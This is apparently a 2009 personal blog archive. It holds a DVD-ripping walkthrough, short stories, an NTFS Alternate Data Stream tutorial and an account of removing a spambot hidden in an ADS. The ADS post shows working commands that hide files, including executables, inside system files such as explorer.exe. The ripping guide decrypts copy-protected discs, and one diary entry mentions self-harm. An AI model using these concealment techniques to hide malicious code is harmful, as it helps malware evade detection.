The program window shows DVD information like the Label and the Region Code Enhancement (RCE) protection status etc. You can change the destination directory where the ripped files will be kept by clicking on the small folder Icon in the Destination frame of the program window.

On your right hand side of the program window, the list of files on the DVD will be shown. The .VOB files are the movie files and the .IFOs are information files that tell DVD players where a movie chapter begins etc. The .BUPs are backups of the .IFOs.

The DVD may contain several IFOs, but what is important is the IFO that points to the main movie. Look carefully in the list of files on the right. The IFO that has the largest sized VOBs under it is the IFO that we will be using later. In the case of my example VTS_01_0.IFO is the IFO that we will be using later since VTS_01_1.VOB, VTS_01_2.VOB etc are the main movie files (check the file size to get an idea).

In any case let DVD Decrypter select the main movie for you. Go to Edit > Select Main movie files

Once that is done and a output folder selected, you can start the DVD Ripping process by clicking on the DVD icon on the bottom of the program window.

Sit back and relax while DVD Decrypter does its work. The ripping process should take roundabout 10 minutes to finish.

Part II [Making the XVid Avi from the Ripped DVD]

Once the ripping is over, close DVD Decrypter and run AutoGK.

Click on the input file folder icon and browse to the DVD rip folder. Select the IFO file and click open to load the IFO.

Depending on the DVD a "Select PGC" window may be shown as follows. Select the Program Chain (PGC) that has a longer length. In my case PGC 1 had a length of 2 hours, 22 minutes, 46 seconds and 24 milliseconds.

Select the location of the output file by clicking on the folder icon in front of the output file text box in the main AutoGK program window. Type a name that you want the output file to have and click Save.

In a DVD you will often find that there are multiple audio tracks, 6 channels (6ch) are better than 2chs. Make your choice of language (if applicable) and proceed to the Step 3 frame. Here you can choose the final size of the movie that will be output. The higher the size, the better the quality, but most 700 MB (1 CD size) movies are also good enough. Select a size or provide your own using the Custom Size option. In my case I selected English 6 ch audio track and a movie size of 700 MB (1 CD)

Click on Add job to add the current job to the programs queue and then click on Start to start the actual process.

Sit back and relax. You can actually go to sleep for an hour or 2. AutoGK will use VirtualDubMod and lame.exe to process the video and audio respectively. AutoGk will open and close several windows and it is advisable to leave the program alone till the entire process is complete and you are greeted with a Job finished log entry in the AutoGK log window.

Now go grab some popcorn, start the movie using VLC, K-Lite or your favorite movie player and enjoy!!

One Rainy Day

2009-10-01T05:40:00.000-07:00

I wrote this a year ago.. still fresh in my memories..

Everybody loves the rain. I hate it more than god would allow me to. People also love to celebrate their birthdays with lavish parties and expensive drinks and gifts. I hate the day I was born. I didn’t always hate the falling drops nor birthdays. I was a normal guy, am still now, but people don’t think so.

Traveling to work in a rickety old scooter that my father had bought on his 10th Marriage Anniversary, can be a nightmare, especially when you are working in Mumbai and its pouring outside. To add salt to the injury, my father is an optimistic and refuses to accept the fact that the scooter has all the qualifications to be called a fossil. I hate traveling by the bus. You never know a bus, carrying half the population of China, may go down the several flyovers in the city. My financial capabilities limit my rickshaw travel and the only other notion is to walk and walking 6 and a half kilometers early in the morning is not my cup of tea. Not wanting to hurt my fathers spiritual sentiments attached with the antique, I still half ride, half walk to office.

My job is a pretty plain one. Not that I’m complaining; its not what you would expect a First Class with Hons. Electronics and Telecommunications Engineer to do, but yes I love my job. Mr. Ranaut, my boss, a moron by character, comes to my cabin everyday in the morning, throws 6 or 7 files on my desk and leaves without any logical explanation. My self esteem starts draining everyday at 9 in the morning, until the angel appears. Soft spoken and always in black she comes in exactly 6 minutes after he has left. Sabrina, or more specifically Miss Sabrina, is the love of my life. Trapped under the clutches of the ill-tempered Ranaut, she is his personal secretary. She is the only other person on this planet, after my father of course, who loves my scooter. My apprehensions abound. I can’t make out whether she is sympathisizing with me or likes to pull my leg. Whatever the case, she is one reason why I still work in hell. She comes, we clean up the mess that the devil just made and she promises me for coffee at 1:00 and scampers away. I finish all the files well before 1 and the entire day I act busy, just to avoid his Highness. Sabrina and me have lunch and then she comes and goes every fifteen minutes or so into my cabin till 7:00 and then the boss drops her home and I try starting my scooter till 8:00 and by the time I reach home, I forget what time it is.

Sabrina and I have been working together for over a year now. I never had the courage to tell her that I love her more than anything that could have ever existed. Thought it would ruin our friendship, but hey, they always say, no pain no gain. Many a times I gathered enough courage to stand in front of her, look into her deep black eyes and tell her “I Love…” and then my confidence would buckle under the weight of consequences and I would end up saying something stupid like “I Love… to play football, why don’t you join me?” She would always laugh; I would give anything to see her million dollar smile. She always concluded the interaction by saying “Grow up Ranvir!”. And something told me deep inside that she loved me…..

Sabrina didn’t have a father. Her maternal uncle was everything to her. Mr. Dias had died when Sabrina was doing her final year in Commerce. She was the only daughter in the family and Mrs. Dias had succumbed to childbirth. She wasn’t rich but yes, she could have bought 10 of my scooters this afternoon itself! Sabrina had invited me several times to her house, but I never had the time, it was an excuse that my sub conscious mind would definitely be happy to give. In fact I did not have the courage to go to her house and meet her uncle. I knew where she stayed though, precise directions and a road map; she had taken an entire afternoon explaining me the shortest way from my house and from the office.

It was a Thursday, and as usual I was in my cabin working under files and papers. Sabrina came around just to make sure I was still breathing and ran her fingers through my hair. She informed me that Ranaut was leaving and she had to go along, he had to discuss some points for tomorrows meeting with her. It was the usual reason that he gave her and which she gave me. I saw them leave and then 10 minutes later I left. The clouds had gathered overhead and I knew it would pour any minute now.

I reached Delnaz Lane, on the way to my house when it started raining. I parked (threw would be a better word) my scooter next to a flower shop and knew only god would be able to start it now. I had never stopped here in my life and I knew this place was special because Sabrina’s violin classes were on the second floor of the yellow building right in front of me. I still had the map in my pocket; intuition told me to have a look. My heart started beating faster, if my sense of geography was correct, I was standing just two blocks away from Sabrina’s house!! The man in me finally wanting to run and embrace her. The adrenalin rush was just too much to handle, my legs started carrying me towards her house. It was 9 in my watch.

She lived on the ground floor of Diaspora Apartments, a pink building that rose 5 storey high. I reached the front door, the sign unmistakably reading Mr. Denver Gonzalez, her uncle. It was pouring more heavily now. I gathered all the strength in me, this was the point of no return, I gave the bell a solid ring. Felt sick in the stomach, wanted to run, but vanishing courage gave a final push and I rang the bell again. No response. I rang the bell again. Still no response. The suspense was unnerving. It was 9.10, she never slept this early, never. Where was she?? My heart skipped a beat, unfaithful thoughts coming to my head, she was last seen with the jackal and he never made his intentions clear. The clouds were clearing and I assumed she was out on dinner with her uncle. I left.

I reached home at 11.00 in the night, clothes shoddily wet and scooter in hand. I couldn’t sleep that night. For the first time in my life I had gathered enough courage to walk up to her house and ring the bell and she wasn’t there to open it. I cursed my luck.

The phone rang in the morning, when I was leaving. They asked for me, Sabrina had met with an accident, a bus had rammed into her the previous night, she was on a respirator and had lost lot of blood. They said every second she was growing weaker and she had repeatedly called out his name the previous night. They had found his number in her diary. I stood transfixed. My mom shook me out of stupor and I gathered my senses and I ran, I ran like I have never run in my life. Tears wetting my cheeks all along. Exhausted and with burning lungs, I searched for the Intensive Care Unit.

I cursed myself for letting her go that day with Ranaut, I didn't care if he was alive or dead. Mr. Gonzalez said she was hit by the bus when she was crossing the road after ordering flowers from the Florist at Delnaz Lane for some guy named Ranvir, it was his birthday the next day. My eyes were fixed onto her body when they lowered it down into her grave, where she would rest to eternity. She was still wearing black…..

Once Upon a Thursday..

2009-09-10T21:13:00.000-07:00

Mr. Siva Rao lives somewhere in Jayanagar with his one wife and two sons, the eldest of who is yet to appear for his PUC examinations after his two failed attempts. Known to people as Mr. Siva Rao, although his birth certificate identifies him as Vijayawada Sitaramanjaneyula Rajasekhara Yarlagadda Venkata Samba Siva Rao, he is one man who could over react for even the tiniest murmur of thunder in the sky. Known for his shrill audible voice and chalk white lungi that he keeps folding up his waist, Mr. Siva Rao threatens kids, dogs and bikers alike around his locality. He travels to office everyday on his new CBZ, thank heavens he wears pants then.

It was a beautiful Thursday morning. I was still lazing in bed when I heard Mr. Siva Rao yelling on top of his voice. I could also hear the soft spoken voice of Mrs. Rao coming out through their kitchen window. "How am I supposed to cook? I have been telling you to get the cylinder before this one gets over? Don't tell me I did not warn you?" I could vaguely imagine Mrs. Rao, a short beautiful woman in her mid 40s, pointing her stubby fingers at the now worthless piece of metal. Mr. Rao then proceeded to say something in his native tongue, which fortunately I didn't understand, but he sounded angry. Then abruptly there was silence. I wondered whether a peace treaty had been signed or Mrs. Rao was now no more. I sat upright in my bed, stretching myself. I looked out of my window again to see signs of any movement. Their kitchen window was locked; I assumed there wouldn’t be any more verbal ranting so I slipped out of bed to begin my day.

I went through the morning routine methodically to prevent any wastage of water or electricity which the caretaker of our PG house constantly reminds us of. I ironed my clothes, wore my shoes and stepped out wearing a smile that could give Mona Lisa a run for money.

I first thought it was funny to see 4 men on a bike next to the signal where I usually wait for the bus to arrive, but then I realized, it was the same scene everywhere! Cars were carrying 7-8 people, bikes were loaded with 3-4 people and buses were overflowing! I rubbed my eyes to swallow what I could see. There was less traffic on the road though, even at this peak hour. I was nonchalant and assumed it to be just casual traffic police maneuvers. I skipped 6 buses due to the sudden increase in commuters. The doors would not close, I couldn’t see the driver and the windows were all covered with bums of different sizes. Weird I thought. Looked like as if half of China had invaded India, although, I dint see any Mongoloids amongst the crowd. I was running out of time and knew I would get late for my Annual Performance Review meeting with my Manager. I prayed in silent tears.

Somebody on a bike with a pillion rider stopped in front of me. I was happy to see that there were only two people on the bike. The rider pulled off his helmet and then I recognized Mr. Siva Rao. The pillion rider identified himself as Mr. Shetty, Engineer at another Software company down on Outer Ring Road. Mr. Siva Rao spoke hesitantly with his usual deep accented Tamil accent, "So you waiting for bus? No bus. No bus. Mr. Shetty here waiting for bus since 8.00 AM in the morning. All crowded. You come, I drop you to office. On way to Marathalli right. Sit sit." I couldn't refuse but I couldn't stop myself from asking, "Eh.. Mr. Rao… won't the police fine us for riding three on a bike?" Mr. Siva Rao smiled showing his misshapen canines. "Police no say anything. People taking lifts and using buses to reach office. Less traffic faster to reach office less petrol you see." I could see the end of the tunnel from where all insanity of the public was coming from. I shrugged, squeezed between Mr. Siva Rao and Mr. Shetty and closed my eyes for the rest of the journey.

Mr. Siva Rao dropped me at the closest signal to my office and scampered on with Mr. Shetty although in the distance I could see him wait and pick up another hapless stranded soul on the Ring Road. I brushed off the creases on my shirt and crossed the road. Several people were on foot today. I saw my colleague Ritesh** entering the gates as I walked up to him. "No bike today huh?" He responded with a cold shrug and stared stone faced to the building entrance. "A walk a day keeps the doctor away!" I shook my head; I had heard wittier words than those from him.

My day at the office was normal, with just a few bumps here and there. Lunch was something I was looking forward to. Precisely at 2:00, I locked my workstation and proceeded down towards the cafeteria. Several employees were standing at the entrance talking in hushed tones. I saw several of my friends in the lot too. I walked up to them. "Wassup people? Why is everybody out here?" Raees** whisked me out of the crowd and pointed steadfast at a small notice that had been put up at the counter. I carefully read and re-read the posting. I now knew why people appeared scared and why Raees and the others were tensed as if their exam results were to be declared that afternoon.

I walked down towards the lonely mess that is visited by a handful of people down the road outside the campus wondering aloud; "70 bucks for that food?? That's more then a 50 percent hike in prices. God what else?"

I had never been to a mess before, but what I had heard from the others, the food was good and cheap and this place was hardly visited by anybody. I reached the place following crudely drawn directions given to me by another of my colleague, Guru**. I couldn’t recognize the place though because it had been described by people as a deserted waste of space. There were atleast 30 people in there and several standing in a queue outside!! I saw a familiar face in the queue, I didn't know his name but he was from the same floor that I worked on. I waved to him and casually walked up to where he was standing. Assuming it was unbeknownst to the others, I slowly moved my feet, inch by inch in to the queue. As soon as my feet were inside I proceeded to shift the rest of my body in to the line, discussing mundane topics like the elections, Harry Potter and Carmen Electra with my new found friend to throw him and the others off the track. But alas I forgot there were several seasoned players in this game already in the queue. I soon found myself whisked at the end of the line by several pairs of black strong hands that looked and smelt of tar.

I returned to my lab an hour and half later having had the tastiest food that I had eaten in months. I then proceeded to complete my work. Precisely at 6:00, I fired off the mails that I had kept pending for the past few days. Forwarded some nasty office jokes to my friends, locked the workstation and walked down the stairs to begin my journey back to my room.

My afternoon had passed off peacefully and the morning just seemed so far away. As I walked out of the gate, reality slapped me so hard, my eyes watered. There was less traffic no doubt. But the scenario had not improved a tad. There were people on bikes, cars were loaded. I saw several engineers (by the looks of them and the laptop bags they carried) on the top of three trucks, smiling and waving out to people as if they were campaigning for elections!! I vaguely remembered Swades. I flicked out my new Sony Ericcson Z555i with Gesture Control 2 MP camera phone and randomly clicked some pictures. Down the 8th picture, my phone started ringing. Some unknown number, I hoped it wasn’t some bank wanting to give me a personal loan or credit card or something. The excited voice on the other end was familiar. "Look behind, look behind, behind the red truck, between the bus and the truck… look look…" I turned around to see Mr. Siva Rao flailing his hands as if he had just seen Sachin Tendulkar. I walked up to him and smiled. He looked small without his helmet on. Unbelievably he was alone. I did not question him but clambered on to the bike to get home.

I slept peacefully that night dreaming about me discovering an oil well in the background of my PG house, becoming rich overnight and marrying Katrina Kaif. The first thing I did with the money in my dreams was to buy a bicycle. Thanking God they didn't run on petrol.

** Names changed to protect privacy.

NTFS Alternate Data Streams

2009-09-02T02:08:00.000-07:00

The NTFS file system was a remarkable creation for the world of Windows. Windows NT systems have proven their local security largely on the basis of the NTFS file system. It included several new features: quotas, sparse file support, reparse points, distributed link tracking and the Encrypting File System (EFS). What I am going to describe here is not the file system itself, but a little known property of NTFS called ADS. ADS does not stand for Active Directory Services or Asynchronous Digital Systems or Another Dead Soul or anything that whacky. ADS or Alternate Data Stream is any data attached to another file but not within the file itself. Windows implements many of its little known functions like additional file information and tagging files as encrypted using ADS.

One of the most common uses of ADS has to store additional file information like the Authors name, Word count, Pages and other document data of a word file. You can view and edit this information by right clicking a word document >> properties and clicking on the summary tab. In fact any file will have a summary tab on an NTFS drive so that you can indirectly edit the ADS of that particular file. A file without any custom information added, contains a single data stream called $DATA which is the data inside the file itself and is not an alternate data stream. Any other streams attached to it will have the format filename.extension:ADSname:$data. When you open a normal file the default $DATA is read which is the data in the file itself. A normal file will be of the format filename.extension::$Data (Note there is no ADS). Imagine you had a text file full of passwords and you had attached it to explorer.exe, then to access the contents of passwords.txt file you would have to use explorer.exe:passwords.txt:$Data. You can even have ADS for a folder!! In fact any folder on a NTFS system. You could then store your passwords.txt file attached to C:\Windows!!

You can attach any number of files to any single file or folder. That means you could attach a 699 MB DvDrip AVI to a 4 MB Summer of 69.mp3 without increasing the size of your mp3 by a single byte!! Windows does not show the attached file in explorer or by any normal means. The whole 699 MB can be stored on to the hard disk (without anybody knowing) and retrieved later. Since ADS is not stored inside the parent file, the size of the mp3 remains the same!! Although disk space goes down by the same amount.

That kinda sounds far fetched right? Alright lets have a small demonstration. Lets use explorer.exe and passwords.txt

Open Notepad and type the following:
Orkut=h@ck3rz
Rediff=r3dm0nd123
facebook=!@#c3sium

These are web services and their respective passwords. You could type in anything you want. Then save the file as passwords.txt in C: drive.

Then go to Start >> Run >> cmd to open the command prompt. cd.. your way to C:\> then type the following:

C:\>type passwords.txt > C:\Windows\explorer.exe:passwords.txt

Delete the original passwords.txt file from C: drive. The above command is self explanatory but for all those who didnt grasp its entirety, heres how it works. The type command is a cmd internal command to display the contents of a file, so type [filename] will display the contents of the text file. The >, also called as the output redirection operator is used to redirect output from one command to another command or file. C:\Windows\explorer.exe:passwords.txt is the ADS to explorer.exe called Passwords.txt. Now your file is safe and since you have attached it to explorer.exe (highly unlikely to be deleted) you can sleep well.

To retrieve the text file or the data inside, you can again use the command prompt or notepad.

Using command prompt:
C:\>more < C:\Windows\explorer.exe:passwords.txt

More is used to display output one screen at a time. Conveniently type does not work to display file contents here. The <, also (you must have already guessed it) called the input redirection operator takes the file contents from the file and gives it to more so it is displayed a (screen) page at a time. To dump it back to a text file use:

C:\>echo | more < C:\Windows\explorer.exe:passwords.txt > Passwords.txt

This is slightly complicated. Echo is used to display whatever is given to it as an argument. Echo Hello will display Hello. The pipe (|) is used to pass the output of the more command to echo and the > is used to dump whatever got echoed to the text file Passwords.txt. Here is a simpler method.

Using notepad:
Go to Start >> Run and type the following.

Notepad C:\Windows\Explorer.exe:Passwords.txt

Notepad should open up displaying the contents of the file. You can then use File >> Save As to save it anywhere you want.

I went ahead and wrote a program that allows you to work with NTFS Alternare Data Streams (ADS) with ease. You can scan your whole hard disk for NTFS ADS, you can create, delete, modify and export streams easily. This application uses native Windows API and hence is pretty fast at it. The application called NTStream is available here.

Ntstream

Since ADS is any data attached to another file, it will be deleted only if you delete the parent file or if you use a third party tool to delete it. Always remember the name of the data stream and the parent file to which you attached it. Creating data streams could take up valuable hard disk space (if you are planning to hide large files like movies etc.). You can use ADS to hide any type of data, even executable code. Although thats not a good administrative practice, it can be done. Viruses and worms like Email-Worm.Win32.Dumaru.a and Win2K.Stream use ADS to spread. Use ADS efficiently and non-maliciously, use it to your advantage.

My Angel

2009-08-23T03:49:00.000-07:00

She is a year younger to me. We have known each other for over 2 years now, but it seems like we have known each other for centuries. She’s absolutely normal, no complaints at all, like any other girl of her age, extra sensitive towards ideas that have nothing to do with her, mounting tension about studies and placements gripping her every weekend, a feeble smile when she is hurt and two huge tear drops in her eyes when I’m going back to work. With hair that keeps coming across her face whenever I try to stare into her deep black eyes. She pulls them back of course and I swear to God I forget where I am. Life seems complete when she puts her head on to my shoulders and goes to sleep. I feel like living a thousand years, just looking at her talk with constant nods of her head. Feel like pulling her into my arms when she yells that I wasn't listening to her. Life... Life is dragging me hopelessly... I don't know where...

I was an evangelist, preaching how dangerous women are until I met her. She is the sweetest thing that has happened to me. We have exchanged promises, promises of staying together for now and forever, promises of laughing, playing, fighting, eating, walking, dancing, cooking and all the other things I once thought stupid. I cry in the night, when I go to sleep all alone 800 kms away from my sweetheart. Memories of the times we have spent together, the way she nods her head even when she hasn’t understood what I was telling her, her scolding when I would forget to take my medicines, the threatening messages when I dont call her back after she keeps the phone, the times spent in arguing over unimportant stuff, the things she said to me, the care that I take while speaking lest I hurt her, the "You eat first and tell me, then I'll eat" talks, the exam tips that she often took, the "I will love you forever", the numerous "miss you idiot" and they go on. Memories... Sweet memories are all what I have when I am this far, physically separated but emotionally still single. All our friends who know about us swear by our love, a single soul in two bodies, that's what they say. It's difficult to imagine life without her. We can't live without each other. It's difficult to even leave hands when we are getting down the bus!! Life is beautiful when we are together but yet I have to work here in desolation and solitude staring at my screen in the nostalgic company of her photographs. I think over what I have lost and what I have gained by coming here. It was a choice I had to take. Had to come here to earn, to have her. I know people say "money isn't everything", ask me I say. Was sworn by my family long before I had known her, had promised my folks back home to give them a life that they have always desired and then think about settling down in life. Give them all the luxury that my hardworking father never could provide. And all that within the next 3 years.

But alas, God, I feel, doesn't wish to see us together, I am a mortal fighting to have my love with me for eternity. I cry every day, I pray for us, I hurt myself to subdue the pain within, yet the pain that increases with every single day I spend away from her, away from my little angel, yes I call her my angel, my sweet little angel, the pain never fades. The pain is horrible, it's like somebody is holding on to your dreams ready to leave them so that they fall and shatter and it is assumed that you will forget as winds of time sweep off the dust that remains. Forget her? God I could forget I have to breathe, but her? Why are you asking such a heavy price? I cannot fathom what will happen if I am forced to live without her. I have already lost my senses without her next to me here; it won’t be long before I lose myself completely. With parents who come from psychological backgrounds where falling in love is considered to be a violation of the rules of Mother Nature. Where it is thought upholding the honor and dignity of family traditions, rituals and fervor is more important then you being happy with a girl who means the world to you. Where it is thought the so called man made society will talk year after year about the boy who stood against his parents. Where it is thought that choices made by the elders is always right and it is assumed that you will lead a happy life with a complete stranger. Why did God make choices? Why can’t God make our parents understand? Why can’t God just leave us alone?

Eyes reddened with tears, heart heavy and aching with her thoughts, sleepless with feelings that haunt me day and night, I live on. Why did God ever make religions?

Just Another Morning

2009-08-19T23:11:00.000-07:00

The following post is an old entry from my 2008 diary. Life was so painful back then.

Note: All people, places and incidents mentioned and described are factual. Any resemblance to any person living and reading this is deliberate.

Time & Date: 11:30 AM 05th May 2008
Venue: HSR Layout, Bangalore.

I yawn in my bed, my roommate sprawled on his bed at four arms length. I pick up my cell phone and look at the time, darn time doesn’t run when I want it to. The dim screen of my broken cell phone rudely gestures 8:00. I pull the blanket over myself and try to sleep. My legs protrude out; as if I were 8 feet tall. I curl up my legs and try to sleep again. The fan stops making any noise all of a sudden reminding me that it’s 8:00. I pray in vain, in silent tears that there would be a miracle and the fan would make its familiar 40 dB of whirring, but alas, it’s never happened before. I turn around in my bed, being careful not to fall down. The width of my bed restricts me from performing any other act on it other then perhaps rigidly sleeping out the night. My roommate grumbles in his sleep, “Put on the fan, you ******”. I perform a Kumbhakaran act, with snores to prove I’m fast asleep for the next 30 years… He rolls over and almost falls off. Realizing what just happened, he stands up straight, fully awake – wide eyed, makes sure I dint see him in his gymnastic act and goes back to the comfort of the hard wooded no pillow bed.

Living in the basement of a posh HSR villa doesn’t revoke your destiny to something more meaningful. I get up tired of scrutinizing the ceiling for flaking paint and cobwebs. My morning has just begun. My hopes of having a hot water bath diminish rapidly, I lazily pick my soap, towel and clothes and walk towards the bathroom making sure to carefully navigate around my roommate’s computer kept on the floor. The bathroom happens to be on the outside of the room, and it’s difficult navigating your way amidst broken furniture, two cars and three bikes parked outside. I reach the bathroom safely, without any nails piercing my feet for the umpteenth time, mission accomplished. I smile at my skills and resourcefulness of having reached the bathroom using the broken sofa and the metal drum. The smile fades as soon as I open the broken bathroom door. Half a million mosquitoes swarm out in haste perhaps realizing a human presence breaking their deep slumber or due to the creaking noise of the hanging hinges of the door. I step into the dark, relying on my memory of the bathroom’s structure since the only exhaust window is boarded up to prevent lizards from coming in. I hang my clothes and towel on the door handle and grope around the walls towards the tap. I successfully reach the tap without running my hands and feet over any slimy creatures. Nice day today. I turn on the tap and smile knowingly. After 3 buckets of muddy water down the drain, does the water tank on top promise me some liquid that I was familiar with in Goa. Pure water without the Magnesium or Cobalt (asphalt included perhaps…) or even a gram of maybe Thorium, has become a far fetched reality for us. I look at the ceiling, even though it’s not visible in the dark, asking God “Why me??” He never answers. I silently fill the lone mug with water to the brim, hoping against hope that I don’t find another dead frog in it, and with all the courage needed to talk to my girlfriend’s father, I pour the freezing water over my shriveled body.

I quickly dry up, dusting my towel before I use it and proceed to bring in the Tiffin that supposedly carries our breakfast every morning. My roommate, with his afternoon shift another 4 hours away, sleeps idly on the rock hard pillow-less bed. Before getting my plate and spoons out, I make sure that the dreaded hasn’t happened with the non-descript breakfast yet. My hopes crash without making any noise. I grudgingly pick out the dead flies out of the ‘sambhar’, and throw them out of sight. I pray for their dead souls. They looked like a happy family to me. I write a yellow post-it slip with the familiar “Biologically Unsafe to Consume” statement and stick it on the metal container, lest my roommate in desperation attempts to devour its contents.

I slowly open the cupboard but the hinges give way and the resulting resounding thud of the door banging the floor pierces the noisy locality. My roommate jerks out of bed, rubs his eyes, looks at the cupboard door in my hand with stunned silence, and peacefully remarks “Oh… that? That came out yesterday evening. Keep it aside and don’t open the other.” I nod my head with disgraced silence and carefully rest the door next to the cupboard’s rusted sides. I then proceed to get my ironed clothes out and thank God for providing us electricity between 8.00 PM to 8.00 AM.

I open the only tiny window in the hope that sunlight will somehow flood the room. I then search for my shoes under the wooden pillow-less bed and then go on to search for my socks amidst the pile of newspapers, the computer, a cardboard box, three suitcases and two large duffel bags. I finally find them rolled up near the cardboard box that originally contained the CPU, but now acts as a storage bin for unwashed clothes. I check the time and shudder at the sight of the digits on the screen. I make my way out, remembering not to lock the door, although I don’t see how I would manage it without any knob, latch or keyholes in place.

I then begin my 45 minute journey, by bus, to office where life is, thank heavens, a billion times better!!

My Desktop

2009-08-10T01:48:00.000-07:00

I normally refrain from putting a lot of eye-candy on my desktop. Just some necessary icons and shortcuts to applications and folders I access everyday. That was before I found Rainmeter on the Internet.

Rainmeter is a free desktop customization and utility software that allows users to put nifty and useful items on the desktop. Along with some radiant wallpapers from DeviantArt, my desktop now does not look anywhere close to what it was a week ago. Here are some of my customizations. Pick your favorites :)

sunrise

stranded

silky walks

serenity

requiem

peace

light

lightstream

in a whisper

friegh

fire and ice

fields

eve online

elysium

earth from apollo

cold fire

alien planet

My favorite? Peace...

The Case of the Intelligent Spambot

2009-07-22T03:51:00.000-07:00

This is the second case study that was sent to Mark Russinovich, Microsoft, which earned me signed a copy of the 5th Edition of Windows Internals.

I woke up last Sunday to my friend’s unforgivable rumblings about the Internet Speed sitting at the lone desktop in our room. I quickly ducked my head under the covers, what would I expect from a 128 Kb line, 13 or maybe 14 Kbps transfer speed? I tried to convince him half sleepily that it was natural, but when he said he had been downloading a 642 KB Word Document for the past 15 minutes, I had to sit up in bed. We never had a speed issue with the ISP, was hoping this was a first.

I quickly opened the Windows Task Manager, expecting to see any unheard process trying to steal my bandwidth. The processes didn’t look funny, at least not all of them, because I hardly have 15 different processes running on my system. But two things stood out. There were an unexpected number of svchost.exe running and a process called rs32net.exe. I quickly fired up Process Explorer for a more detailed look and to see what new services were being run. The Process Monitor’s Image tab of the Properties for rs32net.exe quickly confirmed my suspicions about its intentions.

I had seen files like these before. Although I wasn’t sure what was eating my bandwidth yet. I fired up the prompt and type netstat –a. I almost fainted at the speed at which the screen went by. My computer was trying to connect to the smtp ports of several systems online! I was taken aback at my systems betrayal. Here’s a snipped output from netstat.

I needed professional help. I quickly fired up TCPView from Sysinternals. Looking at the hundreds of connections being requested did not hurt as much as knowing which processes were responsible.

I had to finally agree that my system was infected by a spambot. Anybody else would have been terrified, I was excited. This was the first time that I had come face to face (well not literally) with a spambot. I still couldn’t figure out how rs32net.exe fit into the picture. So I simply killed it to take a look at it later. The spambot was connecting first to multiple http servers, presumably to download a list of addresses to which it had to attempt connection. It then proceeded to connect to the several computers that were visible in the list in TCPView.

I first checked the strings in memory for one of the svchost and saved them for later analysis. The strings that I saw were definitely not part of svchost.

Since svchost was involved, I opened up the Management Console and checked what services where running on my system. Two services looked out of place, without any descriptions, and set to automatic yet not started.

I had never heard of them before, decided to take a look at their properties to determine what executable it was. Was surprised to see a colon in the filename of the executable. I immediately realised what it was. I honestly had not expected an NTFS Alternate Data Stream SpamBot to affect my system.

The ext.exe that comes after the svchost is an NTFS ADS or Alternate Data Stream. To access an ADS you have to specify the “host” file followed by a colon and the filename of the ADS. By default all files on an NTFS partition have an ADS, the data in the file itself is stored as an ADS without any name as filename::$DATA

That was interesting enough to wet my appetite to go on. I took a quick morning break, freshened up myself and sat back at the desk to continue my investigation. So I now knew the exact file that was causing the issue. I wanted to extract the ADS and store it in the collection of malware that I have on my computer. I used Streams from Sysinternals to view the ADS size. Streams provides you an option to delete the ADS but I wanted to extract it.

That is when I had to use a GUI tool that I had written long long ago, called NTStream for a software competition when I was still in college. I ran NTStream, just to be safer, on the whole Windows Directory. NTStream scanned 2318 directories and 26802 files in under a minute and displayed the search result in its ListView Interface.

I extracted the stream for later research and then deleted it and the FCI and the ICF services entry from the Windows Registry under the HKLM\System\CurrentControlSet\Services\FCI and HKLM\System\CurrentControlSet\Services\ICF respectively. I then deleted rs32net from the System32 directory, just in case, and then proceeded to enable my Network Connection that I had disabled to prevent the ISP calling up or disconnecting me forever from the online world for using my system to spam.

As soon as I enabled the Internet Connection, the flurry of Network Activity was reported again by TCPView. Damn! This was definitely the sign of an executable in memory or some driver or dll that was still doing what it was supposed to do, spam.

I fired up Procmon to view disk activity just in case to see if svchost was acting funny elsewhere on the hard drive. Never before in my life was I greeted with this by Procmon.

I was sure I was an Administrator on my system. Very sure about it. I checked just in case wondering whether I was downgraded to a limited user by a hitherto unknown power. The command net user %username% at a command prompt told me I was very well an Administrator and a member of the Debuggers Group. I ran Procmon again and viewed its properties in Process Explorer to make sure I had the SeLoadDriverPrivelege enabled. I very well had.

This was weird. The only hope I now had was Sysinternals' RootKit Revealer. I quickly pulled it out of my toolkit and ran it scanning in default mode. I was hoping it would return something more concrete.

The scan revealed several discrepancies, but what caught my attention was the lone result from the file system right at the bottom of the 3576 entries. Now the only way to access the file, that I thought of was to boot from an alternate medium and check. But luckily I had installed a copy of the Recovery Console on my system. I restarted the computer in Recovery Console, navigated to the C:\Windows\System32\Drivers directory and issued a dir tj* command. I was delighted to see the file there. Although I had not exactly figured out the role of the TJTXSGTX.SYS driver in this whole case, I was nevertheless delighted to see that the file was at least visible under the recovery console. I promptly deleted the file and restarted the computer normally. I then enabled my Internet Connection and waited with bated breath for the sequence to start again. After 5 minutes of suspense, when nothing happened, I decided to close the case after running an sfc /scannow.

PS: By the way, my friend installed a popular antivirus and managed to clean other infections later in the evening. He claimed it took him little over 30 minutes, unlike me. I appreciate his humor.

The Aftermath.

2009-07-16T01:34:00.000-07:00

This incident happened somewhere in February 2008.

I was woken by the shrill ringing of my dad’s alarm clock. I jumped up in bed and rummaged around to silence the annoying ring still wondering why the alarm was ringing in my room. I finally managed to find it tucked under the bed covers in the most inaccessible corner of the bed. Silencing it I rubbed my eyes looking at the time that it displayed. 4:00!! Never in my 12 years of schooling, 2 years of high school and 4 years of Engineering did I ever wake up at 4:00.. This was absurd. I shook the damn clock, picked up my mobile phone and checked the time again. It showed 4:04 AM, but the 4 additional minutes towards another lazy morning didn’t warm my spirits. I chucked the clock on the table in some far reclusive corner under a pile of programming books and slumped back in the warmth of my bed, sinking in its soft clutches stretching my legs as far as they would go in the depth of my bed covers. I had just pulled the pillow over my head when the door knocked. I ignored the first 3 knocks but then they came harder. 6 knocks in line, loud and resonating, probably produced with hands the size of dustbin lids. Wondering if there could be a mountain troll standing out ready to nail me at this unearthly hour, I reluctantly pulled myself up, heaved my drowsy legs on to the floor and swayed towards the door muttering under my breath. The energy required to walk across my room to the door was devastatingly colossal. The knocks sounded again, louder this time. I prayed it wasn’t my youngest brother playing another of his out of the box tricks on me. If it was, I would drown him in the tub. I turned the knob and yanked the door a bit.

My father pushed the door open and half walked, half ran in. Jubilant and with twinkling eyes, as though he had won an argument with my mom, he put on the lights and starting rambling something incoherent to my drowsy ears. “Are u even listening!!??”, he was almost towering over me. “Haan dad, what happened, its 4:00 in the morning…. (yawn..) for heaven’s sake can we like talk at 10:00 or something… (yaaaaawwwwwn...)”.

